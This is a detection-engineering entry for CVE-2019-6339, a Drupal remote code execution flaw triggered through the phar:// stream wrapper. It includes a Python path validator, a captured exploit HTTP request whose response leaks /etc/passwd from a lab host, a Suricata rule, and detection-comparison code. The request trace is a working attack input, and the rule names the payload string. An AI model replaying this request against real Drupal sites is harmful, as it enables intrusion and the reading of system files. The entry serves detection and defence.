T1190-CVE-2019-6339-Drupal remote code execution vulnerability
Description from ATT&CK
Adversaries may use software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (such as SQL), standard services (such as SMB or SSH), and any other application with an Internet-accessible open socket, such as web servers and related services. Depending on the flaw being exploited, this may include Exploitation for Defense Evasion.
If an application is hosted on cloud-based infrastructure, exploiting it may lead to compromise of the underlying instance. This can give an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
For websites and databases, the OWASP Top 10 and CWE Top 25 highlight the most common web-based vulnerabilities.
Test case
Drupal is an open-source content management framework (CMF) written in PHP; it consists of a content management system (CMS) and a PHP development framework. It has won the global best CMS award several years in a row and is the best-known PHP-based web application. Drupal is usually compared with another well-known open-source CMS, Joomla. Because it is considered "harder" and has fewer Chinese-language resources than Joomla, Drupal is less widely used in China than Joomla.
Drupal core versions 7.x before 7.62, 8.6.x before 8.6.6 and 8.5.x before 8.5.9 contain a remote code execution vulnerability in PHP's built-in phar stream wrapper. A remote attacker can exploit it to execute arbitrary PHP code.
In Drupal core 7.x before 7.62, 8.6.x before 8.6.6 and 8.5.x before 8.5.9, a remote code execution vulnerability exists in PHP's built-in phar stream wrapper when file operations are performed on a phar:// URI. Some Drupal code (core, contrib and custom) may perform file operations on user input and is therefore exposed to this vulnerability.
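As an added illustration of the defensive principle behind this vulnerability (this is example code written for this page, not Drupal's own fix or validation), the following Python helper shows how a directory setting taken from user input can be checked before any file operation touches it: it rejects values carrying a stream-wrapper scheme such as phar://, NUL bytes, and paths that normalise to somewhere outside an allowlist of permitted roots. The function names, the site root /srv/drupal and the allowed roots are assumptions made for the example.

```python
import os
import re

# Any "scheme://" prefix makes PHP hand the path to a stream wrapper (phar://,
# data://, ...) instead of the local filesystem, so a plain directory setting
# must never carry one.
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://")


class UnsafePathSetting(ValueError):
    """Raised when a user-supplied directory setting is not a plain local path."""


def validate_local_directory_setting(value, site_root, allowed_roots):
    """Return the normalised absolute path for a directory setting, or raise.

    Hypothetical helper written for this example, not Drupal's own validation.
    Relative values are interpreted against site_root; the result must lie under
    one of allowed_roots (e.g. the site root and the system temp directory).
    """
    if "\0" in value:
        raise UnsafePathSetting("NUL byte in path")
    scheme = SCHEME_RE.match(value)
    if scheme:
        raise UnsafePathSetting("stream wrapper scheme not allowed: %s://" % scheme.group(1))
    # normpath collapses "." and ".." segments; os.path.join discards site_root
    # when value is already absolute. realpath would additionally resolve
    # symlinks against the live filesystem; normpath keeps the example
    # deterministic when run offline.
    candidate = os.path.normpath(os.path.join(os.path.normpath(site_root), value))
    for root in allowed_roots:
        root = os.path.normpath(root)
        if os.path.commonpath([root, candidate]) == root:
            return candidate
    raise UnsafePathSetting("path outside the permitted roots: %s" % value)


def is_safe_directory_setting(value, site_root="/srv/drupal",
                              allowed_roots=("/srv/drupal", "/tmp")):
    """Boolean wrapper, convenient for form validation or for logging rejects."""
    try:
        validate_local_directory_setting(value, site_root, list(allowed_roots))
        return True
    except UnsafePathSetting:
        return False


if __name__ == "__main__":
    # The value submitted in the test trace on this page, and a normal setting.
    for v in ("phar://./sites/default/files/pictures/2020-10/blog-ZDI-CAN-7232-cat.jpg",
              "sites/default/files", "/tmp", "../../etc"):
        print(repr(v), "->", is_safe_directory_setting(v))
```

The scheme check is the part that addresses this CVE; the root allowlist is the general rule that a setting which names a directory should be confined to locations the application is meant to write to.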
Detection log
HTTP
Test reproduction
The detailed reproduction steps are given at: https://blog.csdn.net/qq_40989258/article/details/104970882
Test trace
POST /admin/config/media/file-system HTTP/1.1
Host: 172.17.41.106:8080
Connection: keep-alive
Content-Length: 340
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.17.41.106:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.41.106:8080/admin/config/media/file-system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,be;q=0.8
Cookie: 8ciy_2132_ulastactivity=1747%2BBj3bIdraT%2FhUrMgbV9hBzsnRDad5PbJ4P8FXwvrlsfGVbOx; 8ciy_2132_nofavfid=1; 8ciy_2132_saltkey=h7AR59Bx; 8ciy_2132_lastvisit=1603172255; SESS69d0dbb3a7ccb7aab441a7efa90bb8ae=WSVdSnEkxmap5tU9TGG21HegyssjX2hEk8BkBOBEyiU

file_temporary_path=phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F2020-10%2Fblog-ZDI-CAN-7232-cat.jpg&file_default_scheme=public&temporary_maximum_age=21600&form_build_id=form-iN0z3-CojyQl7PlFGKxsy68XNcyvFaBLtQY_ffo-efA&form_token=VUzTpwLaFD0IW9_2rt9ntjULAJ_euh4ZmJkcEJAdEfI&form_id=system_file_system_settings&op=Save+configuration

HTTP/1.1 200 OK
Date: Wed, 21 Oct 2020 07:58:45 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5215
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
<!DOCTYPE html>
<html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema.org/ sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema# ">
<head>
<meta charset="utf-8" />
<noscript><meta http-equiv="Refresh" content="0; URL=/big_pipe/no-js?destination=/admin/config/media/file-system" />
</noscript><meta name="Generator" content="Drupal 8 (https://www.drupal.org)" />
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="shortcut icon" href="/core/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<title>File system | drupal</title>
<link rel="stylesheet" href="/sites/default/files/css/css_U8KsIL9-p4iwTqZpkdfkA6i7Xu4DQ29N9DEp1Suvl74.css?0" media="all" />
<link rel="stylesheet" href="/sites/default/files/css/css_Va4zLdYXDM0x79wYfYIi_RSorpNS_xtrTcNUqq0psQA.css?0" media="screen" />
<link rel="stylesheet" href="/sites/default/files/css/css_UHkVktzxzRp3Q1t6ZHUZJOcy7NuH6r_v1SicD60WiKQ.css?0" media="all" />
<link rel="stylesheet" href="/sites/default/files/css/css_yPXzUqDWCKESqAn18LazKt4XtPbSaHRtJYq74XoubYg.css?0" media="all" />
<!--[if lte IE 8]>
<script src="/sites/default/files/js/js_VtafjXmRvoUgAzqzYTA3Wrjkx9wcWhjP0G4ZnnqRamA.js"></script>
<![endif]-->
<script src="/core/assets/vendor/modernizr/modernizr.min.js?v=3.3.1"></script>
</head>
<body class="toolbar-tray-open toolbar-horizontal toolbar-fixed toolbar-loading user-logged-in path-admin">
<a href="#main-content" class="visually-hidden focusable skip-link">
Skip to main content
</a>
<div id="toolbar-administration" role="group" aria-label="Site administration toolbar" class="toolbar">
<nav id="toolbar-bar" role="navigation" aria-label="Toolbar items" class="toolbar-bar clearfix">
<h2 class="visually-hidden">Toolbar items</h2>
<div class="home-toolbar-tab toolbar-tab">
<a href="/" title="Return to site content" class="toolbar-icon toolbar-icon-escape-admin toolbar-item" data-toolbar-escape-admin>Back to site</a>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="toolbar-tab">
<a href="/admin" title="Admin menu" class="toolbar-icon toolbar-icon-menu trigger toolbar-item" data-drupal-subtrees="" id="toolbar-item-administration" data-toolbar-tray="toolbar-item-administration-tray" aria-owns="toolbar-item-administration-tray" role="button" aria-pressed="false">Manage</a>
<div id="toolbar-item-administration-tray" data-toolbar-tray="toolbar-item-administration-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="Administration menu"><h3 class="toolbar-tray-name visually-hidden">Administration menu</h3><div class="toolbar-menu-administration"><ul class="toolbar-menu"><li class="menu-item menu-item--collapsed"><a href="/admin/content" title="Find and manage content." id="toolbar-link-system-admin_content" class="toolbar-icon toolbar-icon-system-admin-content" data-drupal-link-system-path="admin/content">Content</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/structure" title="Administer blocks, content types, menus, etc." id="toolbar-link-system-admin_structure" class="toolbar-icon toolbar-icon-system-admin-structure" data-drupal-link-system-path="admin/structure">Structure</a></li><li class="menu-item"><a href="/admin/appearance" title="Select and configure themes." id="toolbar-link-system-themes_page" class="toolbar-icon toolbar-icon-system-themes-page" data-drupal-link-system-path="admin/appearance">Appearance</a></li><li class="menu-item"><a href="/admin/modules" title="Add and enable modules to extend site functionality." id="toolbar-link-system-modules_list" class="toolbar-icon toolbar-icon-system-modules-list" data-drupal-link-system-path="admin/modules">Extend</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/config" title="Administer settings." id="toolbar-link-system-admin_config" class="toolbar-icon toolbar-icon-system-admin-config" data-drupal-link-system-path="admin/config">Configuration</a></li><li class="menu-item"><a href="/admin/people" title="Manage user accounts, roles, and permissions." 
id="toolbar-link-entity-user-collection" class="toolbar-icon toolbar-icon-entity-user-collection" data-drupal-link-system-path="admin/people">People</a></li><li class="menu-item menu-item--collapsed"><a href="/admin/reports" title="View reports, updates, and errors." id="toolbar-link-system-admin_reports" class="toolbar-icon toolbar-icon-system-admin-reports" data-drupal-link-system-path="admin/reports">Reports</a></li><li class="menu-item"><a href="/admin/help" title="Reference for usage, configuration, and modules." id="toolbar-link-help-main" class="toolbar-icon toolbar-icon-help-main" data-drupal-link-system-path="admin/help">Help</a></li></ul></div></nav></div> </div>
<div class="toolbar-tab">
<a href="/admin/config/user-interface/shortcut" title="Shortcuts" class="toolbar-icon toolbar-icon-shortcut trigger toolbar-item" id="toolbar-item-shortcuts" data-toolbar-tray="toolbar-item-shortcuts-tray" aria-owns="toolbar-item-shortcuts-tray" role="button" aria-pressed="false">Shortcuts</a>
<div id="toolbar-item-shortcuts-tray" data-toolbar-tray="toolbar-item-shortcuts-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="User-defined shortcuts"><h3 class="toolbar-tray-name visually-hidden">User-defined shortcuts</h3><ul class="toolbar-menu"><li><a href="/node/add">Add content</a></li><li><a href="/admin/content">All content</a></li></ul><a href="/admin/config/user-interface/shortcut/manage/default/customize" class="edit-shortcuts">Edit shortcuts</a></nav></div> </div>
<div class="hidden contextual-toolbar-tab toolbar-tab">
<button class="toolbar-icon toolbar-icon-edit toolbar-item" aria-pressed="false" type="button">Edit</button>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="tour-toolbar-tab hidden toolbar-tab" id="toolbar-tab-tour">
<button class="toolbar-icon toolbar-icon-help toolbar-item" aria-pressed="false" type="button">Tour</button>
<div><nav class="toolbar-lining clearfix" role="navigation"></nav></div> </div>
<div class="toolbar-tab">
<a href="/user" title="My account" class="toolbar-icon toolbar-icon-user trigger toolbar-item" id="toolbar-item-user" data-toolbar-tray="toolbar-item-user-tray" aria-owns="toolbar-item-user-tray" role="button" aria-pressed="false">admin</a>
<div id="toolbar-item-user-tray" data-toolbar-tray="toolbar-item-user-tray" class="toolbar-tray"><nav class="toolbar-lining clearfix" role="navigation" aria-label="User account actions"><h3 class="toolbar-tray-name visually-hidden">User account actions</h3><ul class="toolbar-menu"><li class="account"><a href="/user" title="User account">View profile</a></li><li class="account-edit"><a href="/user/1/edit" title="Edit user account">Edit profile</a></li><li class="logout"><a href="/user/logout">Log out</a></li></ul></nav></div> </div>
</nav>
</div>
<div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas>
<header class="content-header clearfix">
<div class="layout-container">
<div class="region region-header">
<div id="block-seven-page-title" class="block block-core block-page-title-block">
<h1 class="js-quickedit-page-title page-title">File system</h1>
<a href="/admin/config/user-interface/shortcut/manage/default/add-link-inline?link=admin/config/media/file-system&name=File%20system&destination=/admin/config/media/file-system&token=flS1Fo4ABnGysV5WkcZ2RBFadVpFgQ63k_MtjYRuPHE" class="shortcut-action shortcut-action--add"><span class="shortcut-action__icon"></span><span class="shortcut-action__message">Add to <em class="placeholder">Default</em> shortcuts</span></a>
</div>
</div>
</div>
</header>
<div class="layout-container">
<div class="region region-breadcrumb">
<div id="block-seven-breadcrumbs" class="block block-system block-system-breadcrumb-block">
<nav class="breadcrumb" role="navigation" aria-labelledby="system-breadcrumb">
<h2 id="system-breadcrumb" class="visually-hidden">Breadcrumb</h2>
<ol>
<li>
<a href="/">Home</a>
</li>
<li>
<a href="/admin">Administration</a>
</li>
<li>
<a href="/admin/config">Configuration</a>
</li>
<li>
<a href="/admin/config/media">Media</a>
</li>
</ol>
</nav>
</div>
</div>
<main class="page-content clearfix" role="main">
<div class="visually-hidden"><a id="main-content" tabindex="-1"></a></div>
<div class="region region-highlighted">
<div role="contentinfo" aria-label="Error message" class="messages messages--error">
<div role="alert">
<h2 class="visually-hidden">Error message</h2>
The directory <em class="placeholder">phar://./sites/default/files/pictures/2020-10/blog-ZDI-CAN-7232-cat.jpg</em> does not exist and could not be created.
</div>
</div>
</div>
<div class="help">
</div>
<div class="region region-content">
<div id="block-seven-content" class="block block-system block-system-main-block">
<form class="system-file-system-settings" data-drupal-selector="system-file-system-settings" action="/admin/config/media/file-system" method="post" id="system-file-system-settings" accept-charset="UTF-8">
<div id="edit-file-public-path" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-public-path form-item-file-public-path">
<label for="edit-file-public-path">Public file system path</label>
sites/default/files
<div id="edit-file-public-path--description" class="description">
A local file system path where public files will be stored. This directory must exist and be writable by Drupal. This directory must be relative to the Drupal installation directory and be accessible over the web. This must be changed in settings.php
</div>
</div>
<div id="edit-file-public-base-url" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-public-base-url form-item-file-public-base-url">
<label for="edit-file-public-base-url">Public file base URL</label>
http://172.17.41.106:8080/sites/default/files
<div id="edit-file-public-base-url--description" class="description">
The base URL that will be used for public file URLs. This can be changed in settings.php
</div>
</div>
<div id="edit-file-private-path" class="js-form-item form-item js-form-type-item form-type-item js-form-item-file-private-path form-item-file-private-path">
<label for="edit-file-private-path">Private file system path</label>
Not set
<div id="edit-file-private-path--description" class="description">
An existing local file system path for storing private files. It should be writable by Drupal and not accessible over the web. This must be changed in settings.php
</div>
</div>
<div class="js-form-item form-item js-form-type-textfield form-type-textfield js-form-item-file-temporary-path form-item-file-temporary-path">
<label for="edit-file-temporary-path">Temporary directory</label>
<input data-drupal-selector="edit-file-temporary-path" aria-describedby="edit-file-temporary-path--description" type="text" id="edit-file-temporary-path" name="file_temporary_path" value="phar://./sites/default/files/pictures/2020-10/blog-ZDI-CAN-7232-cat.jpg" size="60" maxlength="255" class="form-text error" aria-invalid="true" />
<div id="edit-file-temporary-path--description" class="description">
A local file system path where temporary files will be stored. This directory should not be accessible over the web.
</div>
</div>
<fieldset data-drupal-selector="edit-file-default-scheme" aria-describedby="edit-file-default-scheme--wrapper--description" id="edit-file-default-scheme--wrapper" class="fieldgroup form-composite js-form-item form-item js-form-wrapper form-wrapper">
<legend>
<span class="fieldset-legend">Default download method</span>
</legend>
<div class="fieldset-wrapper">
<div id="edit-file-default-scheme" class="form-radios"><div class="js-form-item form-item js-form-type-radio form-type-radio js-form-item-file-default-scheme form-item-file-default-scheme">
<input data-drupal-selector="edit-file-default-scheme-public" aria-describedby="edit-file-default-scheme--description" type="radio" id="edit-file-default-scheme-public" name="file_default_scheme" value="public" checked="checked" class="form-radio" />
<label for="edit-file-default-scheme-public" class="option">Public local files served by the webserver.</label>
</div>
</div>
<div id="edit-file-default-scheme--wrapper--description" class="description">This setting is used as the preferred download method. The use of public files is more efficient, but does not provide any access control.</div>
</div>
</fieldset>
<div class="js-form-item form-item js-form-type-select form-type-select js-form-item-temporary-maximum-age form-item-temporary-maximum-age">
<label for="edit-temporary-maximum-age">Delete temporary files after</label>
<select data-drupal-selector="edit-temporary-maximum-age" aria-describedby="edit-temporary-maximum-age--description" id="edit-temporary-maximum-age" name="temporary_maximum_age" class="form-select"><option value="0">Never</option><option value="21600" selected="selected">6 hours</option><option value="43200">12 hours</option><option value="86400">1 day</option><option value="604800">1 week</option><option value="2419200">4 weeks</option><option value="7776000">3 months</option></select>
<div id="edit-temporary-maximum-age--description" class="description">
Temporary files are not referenced, but are in the file system and therefore may show up in administrative lists. <strong>Warning:</strong> If enabled, temporary files will be permanently deleted and may not be recoverable.
</div>
</div>
<input autocomplete="off" data-drupal-selector="form-xxnkpoc7rzwnq4z5jmb-mz1kjulxko1wlfebmesxg0e" type="hidden" name="form_build_id" value="form-XXNkPoC7rZwnq4z5JMb-mz1KJulxKo1WLFEbmESXg0E" />
<input data-drupal-selector="edit-system-file-system-settings-form-token" type="hidden" name="form_token" value="VUzTpwLaFD0IW9_2rt9ntjULAJ_euh4ZmJkcEJAdEfI" />
<input data-drupal-selector="edit-system-file-system-settings" type="hidden" name="form_id" value="system_file_system_settings" />
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions"><input data-drupal-selector="edit-submit" type="submit" id="edit-submit" name="op" value="Save configuration" class="button button--primary js-form-submit form-submit" />
</div>
</form>
</div>
</div>
</main>
</div>
</div>
<script type="application/json" data-drupal-selector="drupal-settings-json">{"path":{"baseUrl":"\/","scriptPath":null,"pathPrefix":"","currentPath":"admin\/config\/media\/file-system","currentPathIsAdmin":true,"isFront":false,"currentLanguage":"en"},"pluralDelimiter":"\u0003","ajaxPageState":{"libraries":"classy\/base,classy\/messages,contextual\/drupal.contextual-links,contextual\/drupal.contextual-toolbar,core\/drupal.active-link,core\/html5shiv,core\/normalize,seven\/global-styling,shortcut\/drupal.shortcut,toolbar\/toolbar,toolbar\/toolbar.escapeAdmin,tour\/tour,user\/drupal.user.icons","theme":"seven","theme_token":"dSH29E-Om61JkNx9kdM-3k77DozHJOeg_hetRt6HTOo"},"ajaxTrustedUrl":{"form_action_p_pvdeGsVG5zNF_XLGPTvYSKCf43t8qZYSwcfZl2uzM":true},"toolbar":{"breakpoints":{"toolbar.narrow":"only screen and (min-width: 16.5em)","toolbar.standard":"only screen and (min-width: 38.125em)","toolbar.wide":"only screen and (min-width: 61em)"},"subtreesHash":"q5SbYHg6y4E5ktkc8Idp0_YGhICDGzYrK47EstXN08M"},"user":{"uid":"1","permissionsHash":"d050762cf90cd597087f492abb3a179258136b50c38a41d068c2cca748489bc0"}}</script>
<script src="/sites/default/files/js/js_BKcMdIbOMdbTdLn9dkUq3KCJfIKKo2SvKoQ1AnB8D-g.js"></script>
<!--[if lte IE 9]>
<script src="/sites/default/files/js/js_VhqXmo4azheUjYC30rijnR_Dddo0WjWkF27k5gTL8S4.js"></script>
<![endif]-->
<script src="/sites/default/files/js/js_vmYBmsMCxrmurAYwjC1NnhJYlQfB1pS1mAlU__M2ar8.js"></script>
</body>
</html>
Detection rules / approach
Suricata rule
alert http any any -> any any (msg:"CVE-2019-6339-Drupal远程代码执行漏洞";flow:established,to_server;content:"POST";http_method;content:"/admin/config/media/file-system";http_uri;content:"phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F";http_client_body;reference:url,blog.csdn.net/qq_40989258/article/details/104970882;classtype:web-application-attack;sid:3002021;rev:1;)
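To make explicit what the rule above keys on, here is an added Python example (written for this page; it is not part of the original entry and not Suricata code) that applies the rule's three content checks literally to a request, and next to it a check that decodes the form body and inspects the file_temporary_path field for any stream-wrapper scheme. The sample requests are constructed from the test trace above, cut down to the request line, a few headers and the form body; the function names are assumptions.

```python
import re
from urllib.parse import parse_qs

SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)://")

# The URI and client-body strings the Suricata rule matches on.
RULE_URI = "/admin/config/media/file-system"
RULE_BODY_LITERAL = "phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F"

# Constructed samples. CAPTURED_REQUEST is cut down from the test trace above.
CAPTURED_REQUEST = (
    "POST /admin/config/media/file-system HTTP/1.1\r\n"
    "Host: 172.17.41.106:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "file_temporary_path=phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fpictures%2F2020-10%2Fblog-ZDI-CAN-7232-cat.jpg"
    "&file_default_scheme=public&temporary_maximum_age=21600"
    "&form_id=system_file_system_settings&op=Save+configuration"
)
# An administrator legitimately setting the temporary directory to /tmp.
BENIGN_REQUEST = (
    "POST /admin/config/media/file-system HTTP/1.1\r\n"
    "Host: 172.17.41.106:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "file_temporary_path=%2Ftmp&file_default_scheme=public&temporary_maximum_age=21600"
    "&form_id=system_file_system_settings&op=Save+configuration"
)
# Same field and same wrapper, but the archive sits directly under files/
# rather than under the pictures/ directory the rule's content string was taken from.
OTHER_DIR_REQUEST = BENIGN_REQUEST.replace(
    "file_temporary_path=%2Ftmp",
    "file_temporary_path=phar%3A%2F%2F.%2Fsites%2Fdefault%2Ffiles%2Fupload.jpg",
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, uri, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body


def suricata_literal_match(raw):
    """The rule's three content checks applied literally: POST method, URI
    substring, and the exact percent-encoded string in the client body."""
    method, uri, _headers, body = parse_http_request(raw)
    return method == "POST" and RULE_URI in uri and RULE_BODY_LITERAL in body


def wrapper_scheme_in_field(raw, field="file_temporary_path"):
    """Decode the form body and return the wrapper scheme found in `field`
    (e.g. "phar"), or None. Independent of how the value was percent-encoded."""
    method, uri, _headers, body = parse_http_request(raw)
    if method != "POST" or not uri.startswith(RULE_URI):
        return None
    for value in parse_qs(body).get(field, []):  # parse_qs decodes %XX and '+'
        match = SCHEME_RE.match(value)
        if match:
            return match.group(1).lower()
    return None


if __name__ == "__main__":
    for name, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST),
                      ("other-dir", OTHER_DIR_REQUEST)):
        print(name, "literal rule:", suricata_literal_match(req),
              "decoded field:", wrapper_scheme_in_field(req))
```

The literal check is tied to the exact percent-encoded string and to the pictures/ upload directory used in this reproduction, so it fires on the captured request but not on the third sample; the decoded check flags any phar:// value in the temporary-directory field regardless of where the archive was uploaded, which is the more robust logic to carry into a production rule (for instance by matching the decoded field value or by shortening the content string to the wrapper prefix).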
Recommendation
This attack is relatively easy to detect with network traffic monitoring combined with security devices.
References
MITRE-ATT&CK-T1190
https://attack.mitre.org/techniques/T1190/
(Environment setup + reproduction) CVE-2019-6339 Drupal remote code execution vulnerability